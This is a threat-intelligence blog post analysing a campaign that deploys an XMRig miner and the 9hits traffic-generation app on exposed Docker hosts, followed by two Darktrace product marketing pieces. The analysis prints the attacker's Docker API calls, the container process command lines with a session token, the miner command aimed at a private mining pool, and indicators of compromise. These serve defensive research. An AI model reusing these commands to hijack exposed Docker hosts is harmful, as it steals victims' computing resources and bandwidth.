Blog
/
Cloud
/
January 18, 2024

Containerised Clicks: Malicious Use of 9hits on Vulnerable Docker Hosts

Cado Security Labs uncovered a new campaign targeting vulnerable Docker services. Attackers deploy XMRig miners and the 9hits viewer application to generate credits. This campaign highlights attackers' evolving monetization strategies and the ongoing vulnerability of exposed Docker hosts.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Nate Bill
Threat Researcher
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
18
Jan 2024

Introduction: Malicious use of 9hits on vulnerable docker hosts

During routine monitoring of our honeypot infrastructure, Cado Security Labs researchers (now part of Darktrace) observed a novel campaign targeting vulnerable Docker services. The campaign deploys two containers to the vulnerable instance - a regular XMRig miner, as well as the 9hits viewer application. This was the first documented case of malware deploying the 9hits application as a payload, based on available open-source intelligence at the time.

9hits [1] describes itself as “A Unique Web Traffic Solution”. It is a platform where members can buy credits, which can then be exchanged for traffic being generated on their website of choice. Members can also run the 9hits viewer app, which runs a headless chrome instance in order to visit websites requested by other members, in exchange for a cut of the credits.

Screenshot from 9hits
Figure 1: Steps for using 9hits platform from viewer app

The viewer app responsible for generating hits and credits is now being deployed by malware, in order to generate credits for the attacker.

Initial access

The containers are deployed on the vulnerable Docker host over the Internet by an attacker-controlled server. Cado Security have been unable to obtain a copy of the spreader, however can speculate that the attacker discovered the honeypot via a service like Shodan. This is because the attacker’s IP does not have any entries in common abuse databases, suggesting it is not actively scanning. It is also possible the attacker is using a separate server for scanning.

After discovery, the spreader uses the Docker API to deploy two containers:

Jan 08 16:44:27 docker.novalocal dockerd[1014]: time="2024-01-08T16:44:27.619512372Z" level=debug msg="Calling POST /v1.43/images/create?fromImage=minerboy%2FXMRig&tag=latest" 
Jan 08 16:44:38 docker.novalocal dockerd[1014]: time="2024-01-08T16:44:38.725291585Z" level=debug msg="Calling POST /v1.43/images/create?fromImage=9hitste%2Fapp&tag=latest" 

This can also be seen reflected in the network capture of the honeypot, originating from IP 27[.]36.82.56 (An IP in Foshan, China). The IP 43[.]163.195.252 (Tencent hosting in Japan) has also been observed in the past.

Network capture
Figure 2: Network capture

Looking closer at the requests, we can observe a user agent of docker client:

User agent of docker client
Figure 3: User agent of docker client

Obviously, it is possible to clone a user agent and make it look like a Docker client. However, the order of API requests in the capture is identical to an actual instance of the Docker CLI. It is likely the attacker is using a script that sets the DOCKER_HOST variable and runs the regular CLI in order to compromise the server.  

The above API calls fetches off-the-shelf images from Dockerhub for the 9hits and XMRig software. This is a common attack vector for campaigns targeting Docker, where instead of fetching a bespoke image for their purposes they pull a generic image off Dockerhub (which will almost always be accessible) and leverage it for their needs.

In Cado’s investigations of campaigns targeting our honeypot, attackers often used a generic Alpine image and attach to it in order to break out of the container and run their malware on the host. In this case, the attacker makes no attempt to exit the container, and instead just runs the container with a predetermined argument.

Payload operation

As mentioned previously, the spreader invokes the Docker container with a custom command to kick start the infection. This command includes configuration and session identifiers.

Using memory forensics, the following processes being run by the 9hits container can be observed:

pid	  ppid	proc	cmd 
2379	2358	nh.sh	/bin/bash /nh.sh --token=c89f8b41d4972209ec497349cce7e840 --system-session --allow-crypto=no 
2406	2379	Xvfb	Xvfb :1 
2407	2379	9hits	/etc/9hitsv3-linux64/9hits --mode=exchange --current-hash=1704770235 --hide-browser=no --token=c89f8b41d4972209ec497349cce7e840 --allow-popups=yes --allow-adult=yes --allow-crypto=no --system-session --cache-del=200 --single-process --no-sandbox --no-zygote --auto-start 
2508	2455	9hbrowser	/etc/9hitsv3-linux64/browser/9hbrowser --nh-param=b2e931191f49d --ssid=<honeypot IP> 

In this case, the entry point for the container is the “ nh.sh ” script, which the attacker has added their session token to. This allows the 9hits app to authenticate with their servers and pull a list of sites to visit from them. Once the app has visited the site, the owner of the session token is awarded with a credit on the 9hits platform.

It appears that 9hits designed the session token system to work in untrusted contexts. It’s impossible to use the token for anything other than running the app to generate credits for the token owner, with the API and authentication tokens being a separate system. This allows the app to be run in illegitimate campaigns without the risk of the attacker's account being compromised.

9hits itself is based on headless Chrome, and as can be seen from the other processes, a browser instance is spawned to visit websites. The no sandbox, single process, and no zygote arguments are frequently passed to Chrome browsers running as root or in containers. There are a few other options that are set for this campaign, such as allowing it to visit adult sites, allowing it to visit sites that show popups, and configuring the cache duration. In addition, the actor behind this campaign has disabled the 9hits app’s ability to visit crypto related sites. The reason for this is unclear.

On the other container deployed by the attacker (XMRig), we can see it executes the following:

<code>1572	1552	XMRig	/app/XMRig -o byw.dscloud.me:3333 --randomx-1gb-pages --donate-level=0</code> 

The -o option specifies a mining pool to use. Most XMRig deployments will use a public pool and tell it the owner's wallet address, which can be frequently combined with the pool’s public data to see how many machines are mining for that address, along with the earnings of the owner. However, in this case it would appear that the mining pool is private, preventing access to statistics related to the campaign.

The dscloud domain is used by synology for dynamic DNS, where the synology server will keep the domain updated with the current IP of the attacker. Performing a lookup for this address at the time of writing, we can see it resolves to 27[.]36.82.56, the same IP that infected the honeypot in the first place.

Conclusion

The main impact of this campaign on compromised hosts is resource exhaustion, as the XMRig miner will use all available CPU resources it can while 9hits will use a large amount of bandwidth, memory, and what little CPU is left. The result of this is that legitimate workloads on infected servers will be unable to perform as expected. In addition, the campaign could be updated to leave a remote shell on the system, potentially causing a more serious breach. This has been seen before with mexals/diicot [2], a Romanian threat actor that maintained access to compromised servers using a malicious SSH key in addition to executing XMRig.

This campaign demonstrates that attackers are always looking for more strategies to make money from compromised hosts. It additionally shows that exposed Docker hosts are still a common entry vector for attackers. As Docker allows users to run arbitrary code, it is critical that it is kept secure to avoid your systems being used for malicious purposes.

IoCs

Docker container name Docker container image

faucet 9hitste/app

xmg minerboy/XMRig

Mining pool

byw.dscloud.me:3333

Session token

c89f8b41d4972209ec497349cce7e840

References:

[1] https://9hits.com/

[2] https://www.darktrace.com/blog/tracking-diicot-an-emerging-romanian-threat-actor

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Nate Bill
Threat Researcher

More in this series

No items found.

Blog

/

AI

/

September 26, 2025

One-Person Security Team, Enterprise-Wide Protection: A Utility Company’s Darktrace Success Story

Default blog imageDefault blog image

A critical mission: Securing public utility systems

This company manages essential utility infrastructure across more than 100 distributed sites, resulting in a wide attack surface spanning both information technology (IT) and operational technology (OT). With attacks on critical infrastructure rising, the company wanted to strengthen defenses.

The limits of traditional tools

The existing mix of conventional tools for visibility and security monitoring posed numerous limitations:

  • Fragmented tools required switching between dashboards to piece together insights
  • Multiple tools were required to both identify and take action on potential incidents
  • Integration between IT, OT, cloud and email required heavy manual effort
  • Existing cybersecurity investments were failing to deliver favorable ROI

A security team of one

For the company’s one-person security team and Vice President of IT, juggling multiple tools and switching between platforms were drains on his time and impacted threat detection and response times. “If an unknown actor attempts to connect to our networks, I need to know immediately and have the ability to stop them before they can do damage.”

Unified, AI-driven defense with Darktrace

The company wanted to unify IT and OT security, reduce manual workload and deliver actionable intelligence in real time. “Darktrace offered the visibility and autonomous capabilities we needed for a proactive defense, including the ability to both see incidents and take action through a single-pane-of-glass.”

Today, the company is using the Darktrace ActiveAI Security Platform™ as the cornerstone of its defense strategy, including:

Real-time protection without the overhead

When compared to a security operations center, the VP said Darktrace is faster, more efficient and more accurate – delivering holistic protection without the high cost or risk of human error.

Darktrace’s Autonomous Response has been a game changer for a shop our size. It stops attacks in real time, before they can move laterally. As a team of one, I can adjust Darktrace’s autonomous actions, ensuring the AI automatically takes stronger actions during off hours to contain threats.”

A single platform for holistic visibility and resilience

Initially licensed under an OT-only pricing model, the company quickly recognized the broader value of Darktrace Self-Learning AI – extending deployment across its IT, cloud, email and endpoint environments and consolidating multiple tools. This holistic visibility is also helping the company to meet ISO and SEC compliance requirements.

A rapid, guided and streamlined deployment

The VP described the Darktrace rollout as smooth and highly collaborative, noting that Darktrace, “Held our hand throughout the process and was genuinely interested in making sure our experience with the platform and the company was top notch.” Despite the complexity of managing multi-connectivity for 100 sites, rollout took less than one week, guided by a clear plan from the Darktrace implementation team.

From barriers to breakthroughs

A seamless security ecosystem

With Darktrace, the company now operates a seamless, AI-driven security ecosystem that combines deep threat validation, intuitive user experience, and a single pane of glass for holistic cyber defense. What began as an OT-focused deployment has grown into a platform that unifies IT, OT, cloud, email and endpoint visibility, delivering comprehensive protection without the overhead of managing multiple tools.

From false positives to real-time, autonomous precision

Since using Darktrace, the company’s false positives have decreased to single digits per day. Within three months, Darktrace conducted 1,470 total investigations, resolving 92% of those autonomously. And Darktrace consistently catches threats that other tools miss:

  • When a remote call center agent landed on a malware-laden site using their company device, the company’s endpoint solution failed to catch it. But Darktrace / ENDPOINT detected the malicious traffic in real time, immediately cutting the connection and blocking the machine from the home network – stopping the attack before it could spread.
  • Darktrace / EMAIL has consistently flagged suspicious messages other tools missed, including credential harvesters or malware disguised as legitimate emails. “Occasionally users request the release of a legitimate email, whether it’s a blocked link or a message diverted to junk. But 10% of those messages could have caused real harm,” said the VP. “And because Darktrace AI is always learning and adapting, it will identify similar legitimate emails in the future, reducing false positives. That tradeoff is well worth it.”

Time saved, confidence gained

For the VP, one of the biggest benefits is time. In less than one month, Darktrace saved the company 264 analyst hours spent on investigations, only escalating 8% of suspected threats for further review. And with Darktrace’s unified dashboard and real-time monitoring, the VP said, “I no longer have to spend time verifying each security tool is working because I can see everything in one location. And, if there is an issue, Darktrace will let me know. That gives me confidence to let the system handle threats while I focus on other priorities.”

Strengthening OT without complexity

The VP said Darktrace / OT has become one of the most valuable aspects of the deployment. Darktrace / OT provides visibility into firmware levels, PLC communications and unusual device interactions that even dedicated OT tools miss. And using Darktrace, the company can segment OT networks securely while still monitoring them through a single interface, strengthening resilience without adding complexity.

Turning cybersecurity into a business catalyst

By reducing tool sprawl, automating responses, and adapting to the unique rhythms of the organization, Darktrace has transformed the company’s cybersecurity from a constant worry into a reliable foundation.

For us, cybersecurity isn’t just about blocking threats, it’s about building resilience that frees us to focus on growth and innovation. With Darktrace as a trusted partner, we’re no longer stuck reacting to problems; we’re shaping a future where security is a catalyst, not a constraint.”
Continue reading
About the author
The Darktrace Community

Blog

/

Cloud

/

September 25, 2025

Announcing Unified Real-Time CDR and Automated Investigations to Transform Cloud Security Operations

Default blog imageDefault blog image

Fragmented Tools are Failing SOC Teams in the Cloud Era

The cloud has transformed how businesses operate, reshaping everything from infrastructure to application delivery. But cloud security has not kept pace. Most tools still rely on traditional models of logging, policy enforcement, and posture management; approaches that provide surface-level visibility but lack the depth to detect or investigate active attacks.

Meanwhile, attackers are exploiting vulnerabilities, delivering cloud-native exploits, and moving laterally in ways that posture management alone cannot catch fast enough. Critical evidence is often missed, and alerts lack the forensic depth SOC analysts need to separate noise from true risk. As a result, organizations remain exposed: research shows that nearly nine in ten organizations have suffered a critical cloud breach despite investing in existing security tools [1].

SOC teams are left buried in alerts without actionable context, while ephemeral workloads like containers and serverless functions vanish before evidence can be preserved. Point tools for logging or forensics only add complexity, with 82% of organizations using multiple platforms to investigate cloud incidents [2].

The result is a broken security model: posture tools surface risks but don’t connect them to active attacker behaviors, while investigation tools are too slow and fragmented to provide timely clarity. Security teams are left reactive, juggling multiple point solutions and still missing critical signals. What’s needed is a unified approach that combines real-time detection and response for active threats with automated investigation and cloud posture management in a single workflow.

Just as security teams once had to evolve beyond basic firewalls and antivirus into network and endpoint detection, response, and forensics, cloud security now requires its own next era: one that unifies detection, response, and investigation at the speed and scale of the cloud.

A Powerful Combination: Real-Time CDR + Automated Cloud Forensics

Darktrace / CLOUD now uniquely unites detection, investigation, and response into one workflow, powered by Self-Learning AI. This means every alert, from any tool in your stack, can instantly become actionable evidence and a complete investigation in minutes.

With this release, Darktrace / CLOUD delivers a more holistic approach to cloud defense, uniting real-time detection, response, and investigation with proactive risk reduction. The result is a single solution that helps security teams stay ahead of attackers while reducing complexity and blind spots.

  • Automated Cloud Forensic Investigations: Instantly capture and analyze volatile evidence from cloud assets, reducing investigation times from days to minutes and eliminating blind spots
  • Enhanced Cloud-Native Threat Detection: Detect advanced attacker behaviors such as lateral movement, privilege escalation, and command-and-control in real time
  • Enhanced Live Cloud Topology Mapping: Gain continuous insight into cloud environments, including ephemeral workloads, with live topology views that simplify investigations and expose anomalous activity
  • Agentless Scanning for Proactive Risk Reduction: Continuously monitor for misconfigurations, vulnerabilities, and risky exposures to reduce attack surface and stop threats before they escalate.

Automated Cloud Forensic Investigations

Darktrace / CLOUD now includes capabilities introduced with Darktrace / Forensic Acquisition & Investigation, triggering automated forensic acquisition the moment a threat is detected. This ensures ephemeral evidence, from disks and memory to containers and serverless workloads can be preserved instantly and analyzed in minutes, not days. The integration unites detection, response, and forensic investigation in a way that eliminates blind spots and reduces manual effort.

Figure 1: Easily view Forensic Investigation of a cloud resource within the Darktrace / CLOUD architecture map

Enhanced Cloud-Native Threat Detection

Darktrace / CLOUD strengthens its real-time behavioral detection to expose early attacker behaviors that logs alone cannot reveal. Enhanced cloud-native detection capabilities include:

• Reconnaissance & Discovery – Detects enumeration and probing activity post-compromise.

• Privilege Escalation via Role Assumption – Identifies suspicious attempts to gain elevated access.

• Malicious Compute Resource Usage – Flags threats such as crypto mining or spam operations.

These enhancements ensure active attacks are detected earlier, before adversaries can escalate or move laterally through cloud environments.

Figure 2: Cyber AI Analyst summary of anomalous behavior for privilege escalation and establishing persistence.

Enhanced Live Cloud Topology Mapping

New enhancements to live topology provide real-time mapping of cloud environments, attacker movement, and anomalous behavior. This dynamic visibility helps SOC teams quickly understand complex environments, trace attack paths, and prioritize response. By integrating with Darktrace / Proactive Exposure Management (PEM), these insights extend beyond the cloud, offering a unified view of risks across networks, endpoints, SaaS, and identity — giving teams the context needed to act with confidence.

Figure 3: Enhanced live topology maps unify visibility across architectures, identities, network connections and more.

Agentless Scanning for Proactive Risk Reduction

Darktrace / CLOUD now introduces agentless scanning to uncover malware and vulnerabilities in cloud assets without impacting performance. This lightweight, non-disruptive approach provides deep visibility into cloud workloads and surfaces risks before attackers can exploit them. By continuously monitoring for misconfigurations and exposures, the solution strengthens posture management and reduces attack surface across hybrid and multi-cloud environments.

Figure 4: Agentless scanning of cloud assets reveals vulnerabilities, which are prioritized by severity.

Together, these capabilities move cloud security operations from reactive to proactive, empowering security teams to detect novel threats in real time, reduce exposures before they are exploited, and accelerate investigations with forensic depth. The result is faster triage, shorter MTTR, and reduced business risk — all delivered in a single, AI-native solution built for hybrid and multi-cloud environments.

Accelerating the Evolution of Cloud Security

Cloud security has long been fragmented, forcing teams to stitch together posture tools, log-based monitoring, and external forensics to get even partial coverage. With this release, Darktrace / CLOUD delivers a holistic, unified approach that covers every stage of the cloud lifecycle, from proactive posture management and risk identification to real-time detection, to automated investigation and response.

By bringing these capabilities together in a single AI-native solution, Darktrace is advancing cloud security beyond incremental change and setting a new standard for how organizations protect their hybrid and multi-cloud environments.

With Darktrace / CLOUD, security teams finally gain end-to-end visibility, response, and investigation at the speed of the cloud, transforming cloud defense from fragmented and reactive to unified and proactive.

[related-resource]

Sources: [1], [2] Darktrace Report: Organizations Require a New Approach to Handle Investigations in the Cloud

Continue reading
About the author
Adam Stevens
Senior Director of Product, Cloud | Darktrace
Your data. Our AI.
Elevate your network security with Darktrace AI